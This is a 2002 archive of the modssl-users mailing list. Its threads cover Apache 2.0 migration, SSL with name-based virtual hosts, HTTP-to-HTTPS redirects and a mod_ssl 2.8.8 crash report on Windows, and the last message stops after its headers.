MAILININ24-0405134524; Fri, 05 Apr 2002 13:45:24 -0500 Date: Fri, 05 Apr 2002 13:45:10 -0500 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: RE: Apache 2.0.* and SSL Message-ID: <01EB322D.557C3513.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! Well said, and the written support from the group is long overdue, as are the well deserved compliments. I intend to rip out the bundled Apache from my SuSE Pro 7.3 distribution and give the new threaded Apache a go. (I intend to do the same with Netscape, Mozilla and Sendmail while I am at it so I have full control over the key elements of my system beyond Linux itself. SuSE rpms are never up-to-date one these services, even when they are available, so I prefer to do the builds 'the old fashioned way'. Regards to all, George >Hi mod_ssl users, > >As most of you probably know, the development efforts of Apache 2 are >going to result in a product, soon. The current betas are already >stable, mature, fast, portable than ever, strong, and support many >features that we have dreamed about for years, like filtering (I >mention this feature, and not zillion others, because it is important >specifically for SSL). > >Yes, it's true that some of us didn't like various things, and that the >development process was not optimal and took too much time. > >But this effort comes (finally...) to a successful end, and I believe >that everybody who uses SSL (including myself...) should do the >migration. > >Contrary to past versions, this one is a dramatic change in the >integration of SSL. No more patches, no more re-compilations with >"-DEAPI", no more 3rd party modules which cause Apache to crash because >these modules were not compiled using this flag, no more specific >versions of mod_ssl per each version of Apache, no more repeating >merges of the patches of mod_ssl. > >Now, thanks to the filtering feature, mod_ssl is separate, and doesn't >depend on modifications in the core of Apache. > >Thanks to the White House, mod_ssl is not a national secret that can't >be distributed, anymore. > >Thanks to the USPTO, mod_ssl doesn't depend on a protected patent >anymore (it expired. RSA even gave up 2 weeks). > >And thanks to ASF, mod_ssl is a standard part of Apache. > >Any Apache that will be distributed in the future, will include SSL >support (at least optionally), that can be enabled externally by >installing OpenSSL and adding some directives to the httpd.conf. > >Ben did a great job by creating apache_ssl. >Ralf did a great job too, by improving it, and his impressive efforts >and skills that were invested in developing and maintaining mod_ssl. >We all owe a great thank to Ralf for other Open Source projects that he >does, or joins. > >Now it's time to make the next step, and migrate to Apache 2.0. >It still requires some work and testing. >It can happen if we all join this effort. >I am not a member of ASF, but I'm convinced that everybody will accept >you happily. > >-- >Eli Marmor >marmor@netmask.it >CTO, Founder >Netmask (El-Mar) Internet Technologies Ltd. >__________________________________________________________ >Tel.: +972-9-766-1020 8 Yad-Harutzim St. >Fax.: +972-9-766-1314 P.O.B. 7004 >Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 21:03:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA02238; Fri, 5 Apr 2002 21:02:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from COMAL.uanet.edu id VAA02199; Fri, 5 Apr 2002 21:01:20 +0200 (MET DST) content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: RE: SSL and vhosts X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Date: Fri, 5 Apr 2002 14:00:09 -0500 Message-ID: <4EAB3F5D46284A408F6A998255B118810868A8@COMAL.uanet.edu> Thread-Topic: SSL and vhosts Thread-Index: AcHcyo9mmaxU5cvsQ+yo/gQriZc+lAACKSiQ From: "Hunt,Keith A" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA02219 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Hunt,Keith A" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Ahhh, now I begin to understand. I was incorrectly thinking the secure channel just could not be established. You say it is established but defaults to using the first certificate it can find. That would mean I can forget about my next step, which would have been to try different certificates for different hosts. I can either live with the name mismatch, or use IP-based VHosts. Thanks for your help, Jeff. I did look in the archives, but either you have explained it better or else the explanations have finally started to sink in. > -----Original Message----- > From: Jeff [mailto:thejeff@cashplus.dhs.org] > Sent: Friday, April 05, 2002 12:49 PM > To: modssl-users@modssl.org > Subject: Re: SSL and vhosts > > > Keith, > > Perhaps it would be better to say "Name-based VHosts will not work > correctly or as expected".. > If you search the archives, you will find this has been > brought up many > times and some very good explanations.. > > Basically, the securing of the channel between browser and > server is done > BEFORE any HTTP request is sent to the server - so it is > impossible for the > server to know which name-based VHost you actually want (it > will use the > certificate for the first NBVH) > However, after the channel is secured, then the HTTP request > is sent, and > the server can identify which NBVH you want and reply appropriately.. > > Naturally, it is impossible for the certificate of the first > NBVH to match > more than one NBVH, so users access any other NBVH will always get a > certificate/server name mismatch.. > > Only option for it to work correctly is to use different IP/Port > combinations for each SSL-required VHost > > Rgds > Jeff > > ----- Original Message ----- > From: "Hunt,Keith A" > To: > Sent: Saturday, April 06, 2002 3:21 AM > Subject: RE: SSL and vhosts > > > > > > Well, that all depends on what one is trying to accomplish > -- this case > is for a known, limited, internal user population. As I > said, the mismatch > between host names and cert names is expected at this point. > Heck, the > cert I am using doesn't match the box at all, let alone the > vhost name. > This is still a test machine. My next step would be to see > if separate > certs could be used for separate vhosts and eliminate the > mismatched name > problem. I haven't decided whether that is even very important for my > purposes. > > > > What is perplexing to me is not the mismatched names issue, > but rather > why this works at all when everything I have read says it > won't. That is, > it won't work at all in the sense that the encrypted > connection cannot be > established because of the sequence things are done in the handshake. > > > > > > > -----Original Message----- > > > > From: Hunt,Keith A [mailto:keith@uakron.edu] > > > > Sent: Friday, April 05, 2002 8:20 AM > > > > To: modssl-users@modssl.org > > > > Subject: SSL and vhosts > > > > > > > > > > > > > > > > Please pardon me if this is a dumb question. I have read > > > that SSL and > > > > name-based vhosts cannot be done, yet I set it up and it > > > > seems to be working > > > > OK, apart from the expected complaints about mismatched host > > > > name and server > > > > certificate. Am I missing something? I am running Apache > > > > 1.3.23 and modssl > > > > 2.8.7. on Linux > > > > > > > > > > > > Keith Hunt 330.972.2968 keith@uakron.edu > > > > Internet & Server Systems > > > > The University of Akron > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 21:08:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA02432; Fri, 5 Apr 2002 21:07:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from firebreak.shopsite.com id VAA02427; Fri, 5 Apr 2002 21:06:57 +0200 (MET DST) Received: from there (teton.shopsite.com [10.1.5.122]) by firebreak.shopsite.com (Postfix) with SMTP id 08B405318; Fri, 5 Apr 2002 12:06:55 -0700 (MST) Content-Type: text/plain; charset="iso-8859-1" From: Richard Pyne Organization: Kinfolk.org To: modssl-users@modssl.org, gjmwalsh@netscape.net (George Walsh) Subject: Re: Apache 2.0.* and SSL Date: Fri, 5 Apr 2002 12:06:54 -0700 X-Mailer: KMail [version 1.3.1] References: <01EB322D.557C3513.009AA07D@netscape.net> In-Reply-To: <01EB322D.557C3513.009AA07D@netscape.net> MIME-Version: 1.0 Message-Id: <20020405190655.08B405318@firebreak.shopsite.com> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA02429 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Richard Pyne X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sounds like you would like the emerging Lunar-Linux release that is built from source on the target machine. Take a look at http://Lunar-Linux.org It still has a lot of work to be done, but it looks like it is headed the right direction. It has great tools for keeping a remote server up to date without needing a GUI. --Richard On Friday 05 April 2002 11:45 am, George Walsh wrote: > Hi! > > Well said, and the written support from the group is long overdue, as are > the well deserved compliments. > > I intend to rip out the bundled Apache from my SuSE Pro 7.3 distribution > and give the new threaded Apache a go. (I intend to do the same with > Netscape, Mozilla and Sendmail while I am at it so I have full control over > the key elements of my system beyond Linux itself. SuSE rpms are never > up-to-date one these services, even when they are available, so I prefer to > do the builds 'the old fashioned way'. > > Regards to all, > > George > > >Hi mod_ssl users, > > > >As most of you probably know, the development efforts of Apache 2 are > >going to result in a product, soon. The current betas are already > >stable, mature, fast, portable than ever, strong, and support many > >features that we have dreamed about for years, like filtering (I > >mention this feature, and not zillion others, because it is important > >specifically for SSL). > > > >Yes, it's true that some of us didn't like various things, and that the > >development process was not optimal and took too much time. > > > >But this effort comes (finally...) to a successful end, and I believe > >that everybody who uses SSL (including myself...) should do the > >migration. > > > >Contrary to past versions, this one is a dramatic change in the > >integration of SSL. No more patches, no more re-compilations with > >"-DEAPI", no more 3rd party modules which cause Apache to crash because > >these modules were not compiled using this flag, no more specific > >versions of mod_ssl per each version of Apache, no more repeating > >merges of the patches of mod_ssl. > > > >Now, thanks to the filtering feature, mod_ssl is separate, and doesn't > >depend on modifications in the core of Apache. > > > >Thanks to the White House, mod_ssl is not a national secret that can't > >be distributed, anymore. > > > >Thanks to the USPTO, mod_ssl doesn't depend on a protected patent > >anymore (it expired. RSA even gave up 2 weeks). > > > >And thanks to ASF, mod_ssl is a standard part of Apache. > > > >Any Apache that will be distributed in the future, will include SSL > >support (at least optionally), that can be enabled externally by > >installing OpenSSL and adding some directives to the httpd.conf. > > > >Ben did a great job by creating apache_ssl. > >Ralf did a great job too, by improving it, and his impressive efforts > >and skills that were invested in developing and maintaining mod_ssl. > >We all owe a great thank to Ralf for other Open Source projects that he > >does, or joins. > > > >Now it's time to make the next step, and migrate to Apache 2.0. > >It still requires some work and testing. > >It can happen if we all join this effort. > >I am not a member of ASF, but I'm convinced that everybody will accept > >you happily. > > > >-- > >Eli Marmor > >marmor@netmask.it > >CTO, Founder > >Netmask (El-Mar) Internet Technologies Ltd. > >__________________________________________________________ > >Tel.: +972-9-766-1020 8 Yad-Harutzim St. > >Fax.: +972-9-766-1314 P.O.B. 7004 > >Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org -- Richard B. Pyne rpyne@kinfolk.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 22:40:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA06766; Fri, 5 Apr 2002 22:39:36 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from jedi.hbs.net id WAA06712; Fri, 5 Apr 2002 22:38:23 +0200 (MET DST) Received: from nefertiti.hbs.net (nat-side.hbs.net [65.112.67.4]) by jedi.hbs.net (Post.Office MTA v3.5.3 release 223 ID# 0-58333U400L100S0V35) with ESMTP id net for ; Fri, 5 Apr 2002 14:36:38 -0600 Received: (from pez@localhost) by nefertiti.hbs.net (8.11.6/8.11.6) id g35KduF02113 for modssl-users@modssl.org; Fri, 5 Apr 2002 14:39:56 -0600 Date: Fri, 5 Apr 2002 14:39:56 -0600 From: CJ Kucera To: modssl-users@modssl.org Subject: Re: Respond only to SSL requests? Message-ID: <20020405143956.A1459@hbs.net> References: <20020405090116.C688@hbs.net> <200204051521.g35FLkd02529@d1o900.telia.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200204051521.g35FLkd02529@d1o900.telia.com>; from danalien@datormaffian.com on Fri, Apr 05, 2002 at 05:21:44PM +0200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: CJ Kucera X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, Apr 05, 2002 at 05:21:44PM +0200, Danalien wrote: > I'm no expert, but thought of redirecting all http (port 80) > to https (port 443)? Using the redirect (and or redirectmatch) > directive(s), http://httpd.apache.org/docs/mod/mod_alias.html#redirect > > Something like, > > Redirect / https://www.yousite.com/ On Fri, Apr 05, 2002 at 07:12:12AM -0800, David Marshall wrote: > I use an unsecured Virtual Host on my HTTP side and redirect all > requests to > HTTPS using a "Redirect seeother". Hrm, yeah, I suppose something like that would work. I'd probably end up using mod_rewrite instead, so that it'd match more than just "/". Still, I'd prefer a cleaner version wherein HTTP traffic is just ignored completely. Whatever. I'll just use a RewriteRule. Thanks much for your help! -CJ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 22:59:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA07551; Fri, 5 Apr 2002 22:58:32 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id WAA07537; Fri, 5 Apr 2002 22:58:01 +0200 (MET DST) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Fri, 5 Apr 2002 12:57:55 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1DA1@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: Respond only to SSL requests? Date: Fri, 5 Apr 2002 12:57:49 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I do this on a location by location basis Redirect seeother /loca https://www.yoursite.com/loca Redirect seeother /locb https://www.yoursite.com/locb This may fit your need without mod_rewrite -----Original Message----- From: CJ Kucera [mailto:ckucera@hbs.net] Sent: Friday, April 05, 2002 12:40 PM To: modssl-users@modssl.org Subject: Re: Respond only to SSL requests? On Fri, Apr 05, 2002 at 05:21:44PM +0200, Danalien wrote: > I'm no expert, but thought of redirecting all http (port 80) > to https (port 443)? Using the redirect (and or redirectmatch) > directive(s), http://httpd.apache.org/docs/mod/mod_alias.html#redirect > > Something like, > > Redirect / https://www.yousite.com/ On Fri, Apr 05, 2002 at 07:12:12AM -0800, David Marshall wrote: > I use an unsecured Virtual Host on my HTTP side and redirect all > requests to > HTTPS using a "Redirect seeother". Hrm, yeah, I suppose something like that would work. I'd probably end up using mod_rewrite instead, so that it'd match more than just "/". Still, I'd prefer a cleaner version wherein HTTP traffic is just ignored completely. Whatever. I'll just use a RewriteRule. Thanks much for your help! -CJ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 6 14:27:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA16966; Sat, 6 Apr 2002 14:26:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA16938; Sat, 6 Apr 2002 14:25:04 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1115B4CE6E0; Sat, 6 Apr 2002 14:25:04 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g36AW2X60250; Sat, 6 Apr 2002 12:32:02 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cisco.com id JAA04527; Sat, 6 Apr 2002 09:47:33 +0200 (MET DST) Received: from cisco.com ([192.135.242.65]) by cisco.com (8.8.8/2.6/Cisco List Logging/8.8.8) with ESMTP id NAA12105; Sat, 6 Apr 2002 13:16:53 +0530 (IST) Message-ID: <3CAEA80A.5EE97D86@cisco.com> Date: Sat, 06 Apr 2002 13:17:22 +0530 From: Hassan S Organization: HCL-Cisco X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org, "Ralf S. Engelschall" Cc: Moinak Ghosh Subject: Re: ModSSL 2.8.8 + Apache 1.3.24 crashing on Windows X-Priority: 1 (Highest) References: <3CAAE892.DCE888AA@cisco.com> Content-Type: multipart/alternative; boundary="------------0D475F9ACC76964AD197590C" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Hassan S X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------0D475F9ACC76964AD197590C Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi Ralf, I built the Apache and mod_ssl in Debug configuration to trace out this consistent problem. When I got this unreferenced memory, I clicked cancel to debug using VC++. It says "invalid memory Access" and points to the following source code. API_EXPORT(void *) ap_ctx_get(ap_ctx *ctx, char *key) { int i; ==> for (i = 0; ctx->cr_entry[i] != NULL; i++) if (strcmp(ctx->cr_entry[i]->ce_key, key) == 0) return ctx->cr_entry[i]->ce_val; return NULL; } So, ctx can be either a NULL pointer or uninitialised or corrupted memory reference for this case. Here is the full debug functional trace: ap_ctx_get(ap_ctx_rec *, char *) ssl_io_suck_read(ssl_st *, char *, int) SSL_recvwithtimeout(buff_struct *, char *, int) ssl_io_hook_recvwithtimeout(buff_struct *, char *, int) ap_hook_call_func(char *, ap_hook_entry *, ap_hook_func *) ap_hook_call(char *) buff_read(buff_struct *, void *, int) saferead_guts(buff_struct *, void *, int) read_with_errors(buff_struct *, void *, int) ap_bgets(char * int , buff_struct *) getline(char *, int, buff_struct *, int) read_request_line(request_rec *) ap_read_request(conn_rec *) child_sub_main(int) child_main(int) I understand that memory has been allocated for the request object and for the context (r->ctx) in ap_read_request as follows. And, I am pretty sure that we built under EAPI only. r = ap_pcalloc(p, sizeof(request_rec)); r->pool = p; ..... ..... #ifdef EAPI r->ctx = ap_ctx_new(r->pool); #endif /* EAPI */ Then, How come this ctx value can be NULL or invalid? Is this memory pool will be cleaned-up intermittently? By handling this exception with __try and __except block in ssl_io_suck_read, I can avoid these invalid memory reference errors. But, I want to make sure this doesn't break anything else. I feel there is some buggy code added in mod_ssl2.8.8 since I am not facing this problem with Apache1.3.20 and mod_ssl2.8.4 on the same Win2k server in SSL mode. And, please note that Apache1.3.24 is working perfectly in http mode for me. Please let me know, if you need any other information. Any help is greatly appreciated. Thanks Hassan Hassan S wrote: > Hi, > > I have a situation where I have to redirect from a HTTP to a HTTPS > connection > via a servlet. That is I send a HTTP GET request to a servlet which in > reply sends > a redirect to a web page with the URL protocol changed to HTTPS. > > Till Apache 1.3.20+ModSSL 2.8.4 this was working fine. But after I > upgraded > to Apache 1.3.24+ModSSL 2.8.8 (to get the security fixes :) ), it is > crashing > with a error message like > > "The instruction at "0x6ff90e08" referenced memory at "0x72676f76". The > memory > could not be read." > > If I click Cancel to debug using VC++ it shows an invalid memory access > in ApacheCore.dll. > > My platform config is > > Windows 2000 > MS VC++ 6.0 (SP5) > OpenSSL 0.9.6c (built using MASM optimizations). > > Please let me know where the problem is, or maybe where I should look to > try and > debug this. This has become a critical issue for me! > > Regards, > Hassan. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org --------------0D475F9ACC76964AD197590C Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Hi Ralf,

I built the Apache and mod_ssl in Debug configuration to trace out this consistent problem. When I got this unreferenced memory, I clicked cancel to debug using VC++. It says "invalid memory Access" and points to the following source code.

    API_EXPORT(void *) ap_ctx_get(ap_ctx *ctx, char *key)
    {
        int i;

==>    for (i = 0; ctx->cr_entry[i] != NULL; i++)
                if (strcmp(ctx->cr_entry[i]->ce_key, key) == 0)
                return ctx->cr_entry[i]->ce_val;
        return NULL;
    }

So, ctx can be either a NULL pointer or uninitialised or corrupted memory reference for this case.

Here is the full debug functional trace:
ap_ctx_get(ap_ctx_rec *, char *)
ssl_io_suck_read(ssl_st *, char *, int)
SSL_recvwithtimeout(buff_struct *, char *, int)
ssl_io_hook_recvwithtimeout(buff_struct *, char *, int)
ap_hook_call_func(char *, ap_hook_entry *, ap_hook_func *)
ap_hook_call(char *)
buff_read(buff_struct *, void *, int)
saferead_guts(buff_struct *, void *, int)
read_with_errors(buff_struct *, void *, int)
ap_bgets(char * int , buff_struct *)
getline(char *, int, buff_struct *, int)
read_request_line(request_rec *)
ap_read_request(conn_rec *)
child_sub_main(int)
child_main(int)

I understand that memory has been allocated for the request object and for the context (r->ctx) in ap_read_request as follows. And, I am pretty sure that we built under EAPI only.

 r = ap_pcalloc(p, sizeof(request_rec));
 r->pool            = p;
.....
.....
#ifdef EAPI
    r->ctx = ap_ctx_new(r->pool);
#endif /* EAPI */

Then, How come this ctx value can be NULL or invalid? Is this memory pool will be cleaned-up intermittently?

By handling this exception with __try and  __except block in ssl_io_suck_read, I can avoid these invalid memory reference errors. But, I want to make sure this doesn't break anything else.
I feel there is some buggy code added in mod_ssl2.8.8 since I am not facing this problem with Apache1.3.20 and mod_ssl2.8.4 on the same Win2k server in SSL mode. And, please note that Apache1.3.24 is working perfectly in http mode for me. Please let me know, if you need any other information.

Any help is greatly appreciated.

Thanks
Hassan

Hassan S wrote:

Hi,

   I have a situation where I have to redirect from a HTTP to a HTTPS
connection
via a servlet. That is I send a HTTP GET request to a servlet which in
reply sends
a redirect to a web page with the URL protocol changed to HTTPS.

Till Apache 1.3.20+ModSSL 2.8.4 this was working fine. But after I
upgraded
to Apache 1.3.24+ModSSL 2.8.8 (to get the security fixes :) ), it is
crashing
with a error message like

"The instruction at "0x6ff90e08" referenced memory at "0x72676f76". The
memory
could not be read."

If I click Cancel to debug using VC++ it shows an invalid memory access
in ApacheCore.dll.

My platform config is

Windows 2000
MS VC++ 6.0 (SP5)
OpenSSL 0.9.6c (built using MASM optimizations).

Please let me know where the problem is, or maybe where I should look to
try and
debug this. This has become a critical issue for me!

Regards,
Hassan.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

--------------0D475F9ACC76964AD197590C-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Apr 6 17:25:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25200; Sat, 6 Apr 2002 17:24:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id RAA25181; Sat, 6 Apr 2002 17:23:47 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g36FNjj13508; Sat, 6 Apr 2002 09:23:45 -0600 (CST) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020406092343.018ca310@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) X-Priority: 1 (Highest) Date: Sat, 06 Apr 2002 09:23:43 -0600 To: modssl-users@modssl.org, modssl-users@modssl.org, "Ralf S. Engelschall" From: Server Admin Subject: Re: ModSSL 2.8.8 + Apache 1.3.24 -- Change Topic Cc: Moinak Ghosh In-Reply-To: <3CAEA80A.5EE97D86@cisco.com> References: <3CAAE892.DCE888AA@cisco.com> Mime-Version: 1.0 Content-Type: text/enriched; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, Pardon me for modifying this topic, but I have concerns about what version of modssl to use, especially after reading this message. I'm new to the list and run Apache-1.3.22_1. I was looking for a modssl version that could be used with it in order to set up HTTPS for a virtual host. But, I noticed the links have all been broken or pulled for modssl release 2.8.5. Since I haven't seen the archives yet, I assume there is a good reason and I would need to update Apache and use the latest modssl. Can some one confirm that I should give up looking for a modssl for my version of Apache..?? Going to take several hours to upgrade.... Many thanks....!! At 01:17 PM 4.6.2002 +0530, Hassan S wrote: >>>> Hi Ralf, I built the Apache and mod_ssl in Debug configuration to trace out this consistent problem. When I got this unreferenced memory, I clicked cancel to debug using VC++. It says "invalid memory Access" and points to the following source code. API_EXPORT(void *) ap_ctx_get(ap_ctx *ctx, char *key) { int i; ==> for (i = 0; ctx->cr_entry[i] != NULL; i++) if (strcmp(ctx->cr_entry[i]->ce_key, key) == 0) return ctx->cr_entry[i]->ce_val; return NULL; } So, ctx can be either a NULL pointer or uninitialised or corrupted memory reference for this case. Here is the full debug functional trace: ffff,0000,0000ap_ctx_get(ap_ctx_rec *, char *) ssl_io_suck_read(ssl_st *, char *, int) SSL_recvwithtimeout(buff_struct *, char *, int) ssl_io_hook_recvwithtimeout(buff_struct *, char *, int) ap_hook_call_func(char *, ap_hook_entry *, ap_hook_func *) ap_hook_call(char *) buff_read(buff_struct *, void *, int) saferead_guts(buff_struct *, void *, int) read_with_errors(buff_struct *, void *, int) ap_bgets(char * int , buff_struct *) getline(char *, int, buff_struct *, int) read_request_line(request_rec *) 3333,3333,ffffap_read_request(conn_rec *) child_sub_main(int) child_main(int) I understand that memory has been allocated for the request object and for the context (r->ctx) in ap_read_request as follows. And, I am pretty sure that we built under EAPI only. 3333,3333,ffff r = ap_pcalloc(p, sizeof(request_rec)); 3333,3333,ffff r->pool = p; 3333,3333,ffff..... 3333,3333,ffff..... 3333,3333,ffff#ifdef EAPI 3333,3333,ffff r->ctx = ap_ctx_new(r->pool); 3333,3333,ffff#endif /* EAPI */ Then, How come this ctx value can be NULL or invalid? Is this memory pool will be cleaned-up intermittently? By handling this exception with __try and __except block in ssl_io_suck_read, I can avoid these invalid memory reference errors. But, I want to make sure this doesn't break anything else. I feel there is some buggy code added in mod_ssl2.8.8 since I am not facing this problem with Apache1.3.20 and mod_ssl2.8.4 on the same Win2k server in SSL mode. And, please note that Apache1.3.24 is working perfectly in http mode for me. Please let me know, if you need any other information. Any help is greatly appreciated. Thanks Hassan Hassan S wrote: Hi, I have a situation where I have to redirect from a HTTP to a HTTPS connection via a servlet. That is I send a HTTP GET request to a servlet which in reply sends a redirect to a web page with the URL protocol changed to HTTPS. Till Apache 1.3.20+ModSSL 2.8.4 this was working fine. But after I upgraded to Apache 1.3.24+ModSSL 2.8.8 (to get the security fixes :) ), it is crashing with a error message like "The instruction at "0x6ff90e08" referenced memory at "0x72676f76". The memory could not be read." If I click Cancel to debug using VC++ it shows an invalid memory access in ApacheCore.dll. My platform config is Windows 2000 MS VC++ 6.0 (SP5) OpenSSL 0.9.6c (built using MASM optimizations). Please let me know where the problem is, or maybe where I should look to try and debug this. This has become a critical issue for me! Regards, Hassan. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org <<<<<<<< .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Apr 7 00:47:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA15165; Sun, 7 Apr 2002 00:46:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maild.telia.com id AAA15148; Sun, 7 Apr 2002 00:46:06 +0200 (MET DST) Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241]) by maild.telia.com (8.11.6/8.11.6) with ESMTP id g36Mk5D29818 for ; Sun, 7 Apr 2002 00:46:05 +0200 (CEST) Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43]) by d1o900.telia.com (8.10.2/8.10.1) with SMTP id g36Mk4d17726 for ; Sun, 7 Apr 2002 00:46:04 +0200 (CEST) Message-Id: <200204062246.g36Mk4d17726@d1o900.telia.com> From: "Danalien" To: "modssl-users@modssl.org" Date: Sun, 07 Apr 2002 00:46:02 +0200 X-Mailer: PMMail 2000 Professional (2.20.2360) For Windows 2000 (5.0.2195;2) MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Subject: Client Certificate Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Danalien" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users 